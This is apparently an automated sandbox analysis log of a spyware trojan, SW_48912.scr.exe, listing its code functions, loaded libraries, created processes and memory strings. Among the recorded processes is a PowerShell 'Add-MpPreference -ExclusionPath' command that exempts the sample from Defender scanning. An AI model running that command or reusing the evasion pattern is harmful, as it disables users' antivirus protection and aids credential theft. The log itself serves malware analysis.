                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A70E95_2_014A70E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AF0E05_2_014AF0E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F70C05_2_013F70C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A132D5_2_014A132D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DD34C5_2_013DD34C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0143739A5_2_0143739A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140B2C05_2_0140B2C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F52A05_2_013F52A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014912ED5_2_014912ED
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140D2F05_2_0140D2F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A75715_2_014A7571
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B95C35_2_014B95C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148D5B05_2_0148D5B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E14605_2_013E1460
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AF43F5_2_014AF43F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AF7B05_2_014AF7B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014356305_2_01435630
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A16CC5_2_014A16CC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140B9505_2_0140B950
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014859105_2_01485910
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F99505_2_013F9950
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145D8005_2_0145D800
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F38E05_2_013F38E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFB765_2_014AFB76
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01465BF05_2_01465BF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0142DBF95_2_0142DBF9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140FB805_2_0140FB80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFA495_2_014AFA49
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A7A465_2_014A7A46
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01463A6C5_2_01463A6C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149DAC65_2_0149DAC6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01435AA05_2_01435AA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148DAAC5_2_0148DAAC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01491AA35_2_01491AA3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A1D5A5_2_014A1D5A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A7D735_2_014A7D73
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F3D405_2_013F3D40
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140FDC05_2_0140FDC0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01469C325_2_01469C32
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFCF25_2_014AFCF2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFF095_2_014AFF09
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F1F925_2_013F1F92
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013B3FD25_2_013B3FD2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013B3FD55_2_013B3FD5
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFFB15_2_014AFFB1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F9EB05_2_013F9EB0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04752446
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04744420
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0474E4F6
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A0535
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04760591
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046BC6E0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A0770
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046C4750
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0469C7C0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04732000
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04728158
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04690100
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0473A118
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_047581CC
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_047541A2
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_047601AA
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04740274
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_047202C0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475A352
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_047603E6
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046AE3F0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A0C00
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04690CF2
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04740CB5
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046AAD00
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0473CD1F
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0469ADE0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046B8DBF
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A0E59
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475EE26
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475EEDB
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475CE93
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046B2E90
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04714F40
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04742F30
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046E2F28
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046C0F30
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04692FC8
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0471EFA0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A2840
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046AA840
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046CE8F0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046868B8
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046B6962
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A29A0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0476A9A6
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0469EA80
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475AB40
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04756BD7
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04691460
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475F43F
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04757571
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_047695C3
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0473D5B0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046E5630
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_047516CC
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475F7B0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475F0E0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_047570E9
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A70C0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0474F0CC
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046D516C
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0468F172
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0476B16B
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046AB1B0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_047412ED
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046BD2F0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046BB2C0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A52A0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0468D34C
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475132D
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046E739A
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04719C32
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475FCF2
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04757D73
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A3D40
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04751D5A
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046BFDC0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A9EB0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475FF09
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04663FD5
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04663FD2
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475FFB1
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A1F92
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0470D800
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A38E0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046A9950
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046BB950
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04735910
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04713A6C
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04757A46
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475FA49
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0474DAC6
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046E5AA0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04741AA3
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0473DAAC
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0475FB76
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_04715BF0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046DDBF9
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046BFB80
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_02711B50
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0270ABF0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0270ABE7
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0270C9E0
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0270C9D9
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0270CC00
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0270AD40
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0270AD35
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_02715200
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_02713410
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0272B850
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0457E68E
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0457D758
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0457E2F7
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: String function: 01425130 appears 58 times
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: String function: 0146F290 appears 103 times
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: String function: 01437E54 appears 107 times
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: String function: 013DB970 appears 262 times
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: String function: 0145EA12 appears 86 times
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 0471F290 appears 103 times
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 046D5130 appears 58 times
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 0468B970 appears 262 times
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 046E7E54 appears 107 times
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: String function: 0470EA12 appears 86 times
                Source: SW_48912.scr.exe | Static PE information: invalid certificate
                Source: SW_48912.scr.exe, 00000000.00000002.1940240799.0000000008630000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000000.00000002.1932164126.0000000006BA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000000.00000000.1691490425.0000000000082000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameeexK.exe. vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000000.00000002.1913900446.000000000062E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000000.00000002.1923740023.0000000003596000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesdchange.exej% vs SW_48912.scr.exe
                Source: SW_48912.scr.exe, 00000005.00000002.2040409716.00000000014DD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SW_48912.scr.exe
                Source: SW_48912.scr.exe | Binary or memory string: OriginalFilenameeexK.exe. vs SW_48912.scr.exe
                Source: SW_48912.scr.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: SW_48912.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, m94X3h6Xj5LqJ81Tpq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, m94X3h6Xj5LqJ81Tpq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/7@11/7
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SW_48912.scr.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Mutant created: \Sessions\1\BaseNamedObjects\vGgvonyzfyGgeBbgbQCvrTvs
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_br0ujbvr.zeo.ps1
                Source: SW_48912.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SW_48912.scr.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: sdchange.exe, 0000000A.00000002.3538625637.0000000002A37000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2218139573.0000000002A37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SW_48912.scr.exe | ReversingLabs: Detection: 42%
                Source: unknown | Process created: C:\Users\user\Desktop\SW_48912.scr.exe "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Process created: C:\Users\user\Desktop\SW_48912.scr.exe "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
                Source: C:\Windows\SysWOW64\sdchange.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: textinputframework.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: coreuicomponents.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: coremessaging.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
